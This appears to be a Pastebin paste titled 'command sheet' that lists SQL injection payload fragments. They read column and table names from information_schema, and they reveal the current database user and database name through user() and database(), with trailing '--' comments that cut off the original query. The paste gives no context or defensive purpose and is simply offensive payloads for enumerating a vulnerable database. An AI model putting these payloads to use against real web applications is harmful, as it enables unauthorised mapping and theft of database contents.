Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- command sheet:
- [+]viewing column:
- *(column_name)
- *from information_schema.columns where table_schema=database()--
- [+]viewing table:
- *(table_name)
- *from information_schema.tables where table_schema=database()--
- [+]viewing local user
- *user()
- [+]viewing database name
- *database()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement